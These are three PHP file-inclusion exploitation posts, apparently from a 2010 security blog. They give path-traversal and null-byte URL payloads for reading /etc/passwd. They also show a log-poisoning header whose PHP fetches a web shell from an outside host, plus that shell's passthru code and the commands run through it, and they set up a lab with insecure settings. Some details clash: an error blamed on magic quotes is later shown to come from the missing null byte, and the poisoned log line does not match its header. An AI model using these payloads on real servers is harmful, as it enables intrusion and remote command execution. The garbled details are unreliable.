Insecure PHP Functions And Their Exploits…

May 27, 2010 at 9:14 pm (LFI / RFI, PHP, Programming, Security)

Hey all,

I am going to list various PHP functions and their misuses along with ways to manipulate them:

require($filename);
http://localhost/?filename=/etc/passwd

require("stuff/".$filename);
http://localhost/?filename=/../../../../../etc/passwd

require("stuff/".$filename.".php");
http://localhost/?filename=/../../../../../etc/passwd%00

require("stuff/".$_COOKIE['something'].".php");
javascript:document.cookie = "something=../../../../../etc/passwd%00";

A neat little trick to allow you to upload stuff using these LFI / RFI vulnerabilities, is to poison the log files (access_log / error_log). I figured, the easiest way to do this was to load the live HTTP headers Firefox plug in. Load the LFI page in your browser, capture the request, and change the User-Agent string to some PHP code of your choice. You can then browse to the log file using the LFI or RFI vulnerability, then when the page loads it will execute your PHP code. Look at these headers for instance:

Host: localhost
User-Agent: <?php system('GET http://www.example.com/phpshell/shell.txt > shell.php'); ?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

If you replay this using live HTTP headers it will poison the log file with:

127.0.0.1 - - [27/May/2010:21:30:17 +0100]
"GET /testing/vuln.php?COLOR=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 855 "-" "<?php system('GET.php'); ?>"

Then when you view the log file using the LFI / RFI it will execute the above PHP code. You can then browse to the PHP shell (shell.php) that will be located in the same directory as the LFI / RFI page 🙂

So, say we placed the following code into shell.php:

<? passthru($_GET[pwn]) ?>

Now we have that piece of code on our victim which we can navigate to through the following URL:

http://localhost/shell.php

To take advantage of this simple PHP shell, alls we have to do is:

http://localhost/shell.php%00&pwn=cat%20/etc/passwd%00
http://localhost/shell.php%00&pwn=uname%20-a
http://localhost/shell.php%00&pwn=who
http://localhost/shell.php%00&pwn=ps%20afuuwx

Then the command output will be displayed on the page 🙂

A quick note:

%00 is a NULL
%20 is a SPACE

Until the next time…

Permalink 3 Comments

Playing around with Local and Remote file inclusions…

May 27, 2010 at 10:54 am (LFI / RFI, PHP, Programming, Security)

Hey all,

So with my recent research into web application security I have been playing around with local and remote file inclusions on my local web server 😉 A couple of things to note so that when you perform an LFI or RFI it actually works.

1) Make sure magic quotes is off, so your able to include said files:

; Magic quotes for incoming GET/POST/Cookie data.
magic_quotes_gpc = Off

Otherwise you will get an error similar to this when trying to include files:

Warning: include(http://www.google.com/.php) [function.include]: failed to open stream: HTTP request failed! HTTP/1.0 404 Not Found in /var/www/testing/vuln.php on line 5

Warning: include() [function.include]: Failed opening 'http://www.google.com/.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/testing/vuln.php on line 5

That is magic quotes kicking in, make sure you turn it off before playing with these techniques!

2) Also you need to make sure allow_url_fopen and allow_url_include are set to on:

; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
allow_url_fopen = On

; Whether to allow include/require to open URLs (like http:// or ftp://) as fil$
allow_url_include = On

Or you will get an error that looks similar to:

Warning: include() [function.include]: URL file-access is disabled in the server configuration in /var/www/testing/vuln.php on line 5

Warning: include(http://www.google.com/) [function.include]: failed to open stream: no suitable wrapper could be found in /var/www/testing/vuln.php on line 5

Warning: include() [function.include]: Failed opening 'http://www.google.com/' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/testing/vuln.php on line 5

Now you should be able to play around with LFI/RFI with no issues, consider the following example:

root@bt:/var/www/testing# ls -l
total 16
-rw-r–r– 1 root root 33 May 27 10:48 blue.php
-rw-r–r– 1 root root 20 May 27 10:43 phpinfo.php
-rw-r–r– 1 root root 32 May 27 10:48 red.php
-rw-r–r– 1 root root 297 May 27 10:44 vuln.php
root@bt:/var/www/testing# cat vuln.php
<?php
$color = ‘blue’;
if (isset( $_GET[‘COLOR’] ) )
$color = $_GET[‘COLOR’];
include( $color . ‘.php’ );
?>

<form method=”get”>
<select name=”COLOR”>
<option value=”red”>red</option>
<option value=”blue”>blue</option>
</select>
<input type=”submit”>
</form>

root@bt:/var/www/testing# cat blue.php red.php
<?php echo “testing blue…”; ?>
<?php echo “testing red…”; ?>
root@bt:/var/www/testing#

Goto: http://localhost/testing/vuln.php then play around with the form for a bit (it shouldn’t take you too long, it’s a very simple and contrived example 😉 ) and keep your eye on the variable in the URL bar… try things like this:

http://localhost/testing/vuln.php?COLOR=phpinfo.php
http://localhost/testing/vuln.php?COLOR=../../../../../etc/passwd%00
http://localhost/testing/vuln.php?COLOR=http://www.google.com/%00

Why the %00 on the end, you may ask?

Well that is to cause a NULL at the end of the string and for PHP to stop reading it at that point, otherwise something like this may happen:

Warning: include(http://www.google.com/.php) [function.include]: failed to open stream: HTTP request failed! HTTP/1.0 404 Not Found in /var/www/testing/vuln.php on line 5

Warning: include() [function.include]: Failed opening 'http://www.google.com/.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/testing/vuln.php on line 5

From that it should be pretty clear as to why you need to append the %00, notice the: ‘http://www.google.com/.php&#8217; which is constructed from:

include( $color . ‘.php’ );

$color == http://www.google.com/ . ‘.php’

As the page: http://www.google.com/.php does not exist, it throws an error. Which is why you must append a NULL to the end of your URL/File/String/Etc.

Permalink Leave a Comment

Vulnerable PHP Functions…

May 26, 2010 at 2:06 pm (LFI / RFI, PHP, Programming, Security)

Hey all,

Just a quick note, here is a list of vulnerable PHP functions that you should look out for in your web apps:

Local / Remote file inclusion bugs:

include()
include_once()
require()
require_once()

Local / Remote command execution bugs:

eval()
preg_replace()
fwrite()
passthru()
file_get_contents()
shell_exec()
system()

SQL Injection bugs:

mysql_query()

File / File system bugs:

fopen()
readfile()
glob()
file()
popen()
exec()

For auditing PHP based applications grep is pretty good however the ultimate tool is PHPXRef, which you can check out here.

Permalink 5 Comments